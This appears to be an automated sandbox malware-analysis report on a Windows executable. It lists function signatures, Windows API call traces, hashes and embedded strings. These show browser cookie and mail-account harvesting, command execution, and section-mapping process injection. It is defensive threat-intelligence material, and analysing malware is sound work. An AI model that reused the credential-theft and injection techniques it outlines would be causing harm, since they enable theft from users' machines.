  • Function_00000C50 API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs, String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols, Total Matches: 59
  • Function_0001A47B API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset, String ID: , Total Matches: 59
  • Function_00006E21 API ID: StrToIntExmemcpy, String ID: 0x, Total Matches: 59
  • Function_00008F0B API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen, String ID: , Total Matches: 59
  • Function_00019FC4 API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread, String ID: , Total Matches: 59
  • Function_00006878 API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf, String ID: , Total Matches: 58
  • Function_00000A08 API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf, String ID: W, Total Matches: 58
  • Function_00016222 API ID: mbstowcs, String ID: account{*}.oeaccount, Total Matches: 58
  • Function_00007CA3 API ID: HeapFreelstrlen$mbstowcswcstombs, String ID: , Total Matches: 58
  • Function_0000AD48 API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen, String ID: , Total Matches: 58
  • Function_00006D61 API ID: memcpy$RtlAllocateHeap, String ID: [URL]$https://, Total Matches: 58
  • Function_00009D95 API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi, String ID: , Total Matches: 58
  • Function_000035F0 API ID: HeapFree$RegCloseKeyWaitForSingleObject, String ID: , Total Matches: 58
  • Function_000096B0 API ID: HeapFreeRtlAllocateHeapmemcpy, String ID: Access-Control-Allow-Origin:, Total Matches: 58
  • Function_000067DE API ID: HeapFreeRtlAllocateHeap, String ID: cmd /C "%s> %s1", Total Matches: 58
  • Function_0001D1CF API ID: GetComputerNameHeapFreeRtlAllocateHeap, String ID: Client, Total Matches: 57
  • Function_0001C36B API ID: SetLastErrorSleepWaitForSingleObjectmemset, String ID: vids, Total Matches: 57
  • Function_00006B90 API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy, String ID: , Total Matches: 57
  • Function_00001554 API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen, String ID: , Total Matches: 57
  • Function_00015DF6 API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile, String ID: , Total Matches: 57
  • Function_00003E59 API ID: RtlAllocateHeaplstrcpylstrlenmemcpy, String ID: , Total Matches: 57
  • Function_000069A7 API ID: HeapFree$DeleteFileStrTrimlstrlen, String ID: ss: *.*.*.*, Total Matches: 56
  • Function_00005241 API ID: GetModuleHandleTlsAlloc, String ID: CHROME.DLL, Total Matches: 56
  • Function_000162AD API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory, String ID: , Total Matches: 56
  • Function_00007B4E API ID: HeapFreememcpy$RtlAllocateHeap, String ID: , Total Matches: 56
  • Function_0000339B API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer, String ID: , Total Matches: 56
  • Function_0000748E API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject, String ID: , Total Matches: 56
  • Function_00006E94 API ID: HeapFreememcpymemset, String ID: chun, Total Matches: 56
  • Function_00018EAA API ID: lstrlen$RtlAllocateHeap, String ID: [FILE]$DllRegisterServer, Total Matches: 56
  • Function_0001A703 API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset, String ID: , Total Matches: 56
  • Function_00015F2E API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset, String ID: , Total Matches: 56
  • Function_000018FD API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen, String ID: , Total Matches: 55
  • Function_0000CB50 API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen, String ID: , Total Matches: 55
  • Function_0000B42B API ID: HeapFreelstrlenmemcpy, String ID: Access-Control-Allow-Origin:, Total Matches: 55
  • Function_0000738C API ID: HeapFreeRtlAllocateHeap, String ID: https://, Total Matches: 54
  • Function_00018BD6 API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset, String ID: [FILE]$}nls, Total Matches: 54
  • Function_0000CCEC API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionSleepmemset, String ID: , Total Matches: 54
  • Function_00008D54 API ID: HeapFree$RegCloseKeyRegCreateKey, String ID: , Total Matches: 54
  • Function_00003202 API ID: HeapFreeRegCloseKeyRegOpenKeyRtlAllocateHeap, String ID: Main, Total Matches: 53
  • Function_000164F7 API ID: CreateDirectoryGetTempFileNameGetTickCount, String ID: \Low, Total Matches: 53
  • Function_00018692 API ID: StrTrim$_struprlstrlenmemcpymemset, String ID: , Total Matches: 53
  • Function_0000078D API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread, String ID: , Total Matches: 53
  • Function_00009895 API ID: RtlAllocateHeaplstrcpy, String ID: http, Total Matches: 52
  • Function_0000BB46 API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove, String ID: GET $GET $OPTI$OPTI$POST$PUT , Total Matches: 52
  • Function_00002996 API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey, String ID: [FILE]$[FILE], Total Matches: 51
  • Function_00001B25 API ID: GetLastError$CloseHandleFlushFileBuffersSetEndOfFile, String ID: , Total Matches: 51
  • Function_00001416 API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen, String ID: , Total Matches: 50
  • Function_0000973F API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf, String ID: , Total Matches: 50
  • Function_0000064D API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf, String ID: , Total Matches: 49
  • Function_00008BEF API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap, String ID: W, Total Matches: 48
  • Function_0000A4E6 API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep, String ID: , Total Matches: 46
  • Function_000019BF API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen, String ID: %APPDATA%\Microsoft\, Total Matches: 45
  • Function_00004816 API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy, String ID: , Total Matches: 43
  • Function_00001A39 API ID: HeapFree$CloseHandleRtlImageNtHeader, String ID: [FILE]$[FILE], Total Matches: 43
  • Function_00016471 API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy, String ID: , Total Matches: 43
  • Function_00000586 API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf, String ID: , Total Matches: 43
  • Function_00006664 API ID: HeapFree$GetLastErrorRtlAllocateHeap, String ID: , Total Matches: 40
  • Function_00009F14 API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf, String ID: , Total Matches: 40
  • Function_00000CB2 API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset, String ID: pnls, Total Matches: 38
  • Function_00002D4D API ID: RegCloseKeyRegQueryValueExwsprintf, String ID: Client, Total Matches: 38
  • Function_00000CB2 API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset, String ID: pnls, Total Matches: 38
  • Function_000037EC API ID: HeapFreememcpy, String ID: ($Client, Total Matches: 38
  • Function_0001E422 API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey, String ID: , Total Matches: 37
  • Function_0001D6E9 API ID: GetLastErrorGetVersion, String ID: GET$POST, Total Matches: 37
  • Function_00002F95 API ID: HeapFree$RtlAllocateHeaplstrcmpi, String ID: Main, Total Matches: 37
  • Function_0000CA13 API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen, String ID: , Total Matches: 36
  • Function_00015996 API ID: FlushFileBuffersGetLastErrormemset, String ID: K$P, Total Matches: 35
  • Function_00000E86 API ID: HeapFreeInterlockedExchangeRtlAllocateHeaplstrcpy, String ID: , Total Matches: 34
  • Function_0000332F API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy, String ID: pnls$}nls, Total Matches: 33
  • Function_0000332F API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy, String ID: pnls$}nls, Total Matches: 33
  • Function_00003CEB API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs, String ID: , Total Matches: 33
  • Function_0000C171 API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects, String ID: , Total Matches: 31
  • Function_00000B85 API ID: CreateDirectory$CopyFileHeapFreeRtlAllocateHeaplstrcpy, String ID: \sols, Total Matches: 31
  • Function_000004CA API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary, String ID: USER32.DLL$pnls$pnls, Total Matches: 29
  • Function_000004CA API ID: FindWindowGetModuleHandleGetWindowThreadProcessIdLoadLibrary, String ID: USER32.DLL$pnls$pnls, Total Matches: 29
  • Function_00005604 API ID: HeapFreeRegisterWaitForSingleObjectRtlAllocateHeapmemcpy, String ID: , Total Matches: 29
  • Function_000049D7 API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: , Total Matches: 27
  • Function_00004C23 API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: Main, Total Matches: 27
  • Function_000041AB API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf, String ID: Main, Total Matches: 26
  • Function_0000A410 API ID: CloseHandleCreateThreadGetCommandLineGetLastErrorGetModuleHandle, String ID: , Total Matches: 26
  • Function_00004B7B API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy, String ID: , Total Matches: 25
  • Function_00000F61 API ID: HeapFree$DeleteFileGetLastErrorInterlockedDecrementInterlockedIncrementlstrcpy, String ID: , Total Matches: 25
  • Function_0001E75B API ID: LocalFreelstrcatlstrcpymemcpy, String ID: IMAP$P$POP3$SMTP, Total Matches: 23
  • Function_000003D6 API ID: CloseHandleHeapDestroySetEvent, String ID: , Total Matches: 21
  • Function_00000395 API ID: GetLastErrorHeapFreememset, String ID: D, Total Matches: 21
  • Function_00005C08 API ID: RegCloseKeyRegOpenKeySetEventWaitForSingleObject, String ID: %APPDATA%\Mozilla\Firefox\Profiles, Total Matches: 19
  • Function_00002C8B API ID: GetModuleFileName$GetLastError, String ID: , Total Matches: 12
  • Function_0000044C API ID: HeapFreeStrStrI, String ID: pnls, Total Matches: 9
  • Function_00006422 API ID: CreateProcessGetExitCodeProcessGetLastErrorWaitForMultipleObjectslstrlenmemsetwcstombs, String ID: D$cmd /C "%s> %s1", Total Matches: 8
  • Function_00016A61 API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: , Total Matches: 6
  • Function_00003003 API ID: VirtualAllocVirtualFreelstrcpynmemcpy, String ID: Apr 14 2018$pnls$pnls, Total Matches: 5
  • Function_00003003 API ID: VirtualAllocVirtualFreelstrcpynmemcpy, String ID: Apr 14 2018$pnls$pnls, Total Matches: 5
  • Function_000016C0 API ID: HeapFreeRtlAllocateHeaplstrcpylstrlen, String ID: W, Total Matches: 4
  • Function_0000C890 API ID: HeapFreeLocalFreeReleaseMutexRtlRemoveVectoredExceptionHandlerSleepEx, String ID: , Total Matches: 3
  • Function_00000535 API ID: RtlFreeAnsiStringRtlUpcaseUnicodeString, String ID: pnls, Total Matches: 2
  • Function_00000535 API ID: RtlFreeAnsiStringRtlUpcaseUnicodeString, String ID: pnls, Total Matches: 2
  • Function_00000000 API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeapWriteFilelstrcpy, String ID: qwerty, Total Matches: 1
  • Function_0001D8D2 API ID: GetLastErrorlstrlenwsprintf, String ID: `, Total Matches: 1
  • Function_0001CB79 API ID: HeapFree$GetTickCountRtlAllocateHeap$QueryPerformanceCounterQueryPerformanceFrequencyRtlEnterCriticalSectionRtlLeaveCriticalSectionStrTrim_aulldivlstrcpy, String ID: , Total Matches: 1
  • Function_0000C519 API ID: GetLastErrorRtlAllocateHeap$CloseHandle$CreateMutexLoadLibraryNtQueryInformationProcessOpenProcessmemsetwsprintf, String ID: , Total Matches: 1
  • Function_0001CE6F API ID: HeapFree$lstrcat$RtlAllocateHeap$StrTrimlstrcpy, String ID: , Total Matches: 1
  • Function_0000A7D1 API ID: RtlAllocateHeap$GetLastErrorRtlInitializeCriticalSection, String ID: , Total Matches: 1

General

Root Process Name:Zx7i3Q9U9i.exe
Process MD5:6DDCA324434FFA506CF7DC4E51DB7935
Total matches:79
Initial Analysis Report:Open
Initial sample Analysis ID:44237
Initial sample SHA 256:7AD80E267DEB4DCF858EE8112690CA6EE13D49233F47DAFEB2D7D331DC6D22ED
Initial sample name:0.exe

Similar Executed Functions

Similarity
  • Total matches: 33
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileFindFirstFileGetFileTimeStrChrStrRChrlstrcatmemcpy
  • String ID: pnls$}nls
  • API String ID: 315724681-4252118926
  • Opcode ID: 8b235e28e70d70ecdff0991f1e972a36896af92a2b8f458741844e655a4b3a9d
  • Instruction ID: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
  • Opcode Fuzzy Hash: 4A21B1031986E3D1C932A943E2C2B921651FF42E67C5C63B144FCB63825F14B58F6B9D
  • Instruction Fuzzy Hash: f23ad9b4c0767efc4dcde4b56da14edde6f1918ae0b4da159b2bbee7f7a9c74d
APIs
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E43CD
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 002E43E1
  • CloseHandle.KERNEL32(?), ref: 002E43F8
  • StrRChrA.SHLWAPI(002E11A6,00000000,0000005C), ref: 002E4404
  • lstrcat.KERNEL32(002E11A6,002E825D), ref: 002E443E
  • FindFirstFileA.KERNELBASE(002E11A6,?), ref: 002E4454
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4486
  • StrChrA.SHLWAPI(?,0000002E), ref: 002E44F4
  • memcpy.NTDLL(00000000,?,00000000), ref: 002E452D
  • FindNextFileA.KERNELBASE(?,?), ref: 002E4542
  • CompareFileTime.KERNEL32(?,?), ref: 002E456B
  • HeapFree.KERNEL32(00000000,00000000,002E8049), ref: 002E45A1
  • HeapFree.KERNEL32(00000000,002E11A6), ref: 002E45B1
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 38
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID: pnls
  • API String ID: 82859500-141991303
  • Opcode ID: e910601ac135763dc590ea94eb2919e54113fda6ecca70254a0bfb8fa838b587
  • Instruction ID: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
  • Opcode Fuzzy Hash: 7421CD4515896286DEA3B4954257FC7D142FF83F88C9CFBB4949A5669B0E00300BEB4F
  • Instruction Fuzzy Hash: 95fb6a848e0d037f2556a7362c7f2fd0003c2cb74284c9146bf6e06d04889714
APIs
    • Part of subcall function 002E278F: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
    • Part of subcall function 002E278F: memset.NTDLL ref: 002E280F
    • Part of subcall function 002E278F: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
    • Part of subcall function 002E278F: NtClose.NTDLL(?), ref: 002E283F
  • memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
  • memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1B66: GetModuleHandleA.KERNEL32(002E80DB,?,CCCCFEEB,002E1E8C,?,?,?,00000000), ref: 002E1B99
    • Part of subcall function 002E1B66: memcpy.NTDLL(?,3!?w,00000018,002E845C,002E8400,002E8451), ref: 002E1C04
  • memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E39A5: memset.NTDLL ref: 002E39C4
    • Part of subcall function 002E1C13: memcpy.NTDLL(CCCCFEEB,002E7478,00000018,CCCCFEEB,002E845C,CCCCFEEB,002E8400,CCCCFEEB,002E8451,CCCCFEEB,002E1E84,?,002E23F9,?,?,00000000), ref: 002E1CA4
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
  • CloseHandle.KERNEL32(00000000), ref: 002E1EE0
  • memset.NTDLL ref: 002E1EF4
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
    • Part of subcall function 002E284E: memcpy.NTDLL(-00000004,00000004,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28AE
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?,00000000), ref: 002E28C3
    • Part of subcall function 002E284E: memcpy.NTDLL(?,?,?,?,CCCCFEEB,?,?,?,?), ref: 002E2905
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: e71ad6eecb970af1def45c3799b202ba83529c651fa6d32aa02a68984f086bcb
  • Instruction ID: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
  • Opcode Fuzzy Hash: 7BE0F1411C06C3F798EA64406103F84D7A0FE10A51C9C6B16C1F87E1D00F30305F5A2F
  • Instruction Fuzzy Hash: f4d3a45514e2a78a6ff484cd6517dbf474bab809adfac8e8e781d73a1b5f56bc
APIs
  • NtOpenProcess.NTDLL(002E618C,00000400,?,002E7494), ref: 002E316A
  • NtOpenProcessToken.NTDLL(002E618C,00000008,00000000), ref: 002E317D
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,002E618C), ref: 002E3198
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,002E618C,002E618C,002E618C), ref: 002E31B5
  • memcpy.NTDLL(00000000,00000000,0000001C), ref: 002E31C2
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
  • NtClose.NTDLL(00000000), ref: 002E31D4
  • NtClose.NTDLL(002E618C), ref: 002E31DD
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: b4b338d5d8f61f66a6222dbf3d0f3f210939ec075dfbdcc0bd39eb5c8c15d6ad
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: FCE0C04226CAC4E7E9F2F8451403B2B9140BF80142D5D7BA663A88D67F0F20B0031B1E
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002E27EA
  • memset.NTDLL ref: 002E280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 002E282B
  • NtClose.NTDLL(?), ref: 002E283F
    • Part of subcall function 002E2750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002E277D
    • Part of subcall function 002E2750: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E2784
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 9f3baee91e90600c7ef65055cc937090c80b1848b2f2516f31576c2ec84c2916
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E02608AE0A47CCD46B9C42D482F00A7826F61609DAD39655208293734F2132AFEB3C
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E4A7E
  • GetFileSize.KERNEL32(00000000,00000000,?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4A8E
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 002E4ABA
  • GetLastError.KERNEL32(?,?,002E2AF0,002E74BC,?,?,?,B.,002E2FAC,?,?), ref: 002E4ADF
  • CloseHandle.KERNEL32(000000FF), ref: 002E4AF0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 97ca6bb9ca5fe7b510779c132f311c73afcc437a32033944fe2e30fe2d70fbee
  • Instruction ID: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
  • Opcode Fuzzy Hash: B5019C47292A71C6D501A8068699739F1C3FB42EBAE2CF700D6C1B01DA0ED479F2DB6C
  • Instruction Fuzzy Hash: 389f8e6b2b9a9dadd75e162c423f4892cc8029b080c4ee30251df583d1f82c9e
APIs
  • memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E1FFA: memset.NTDLL ref: 002E2036
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
  • SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
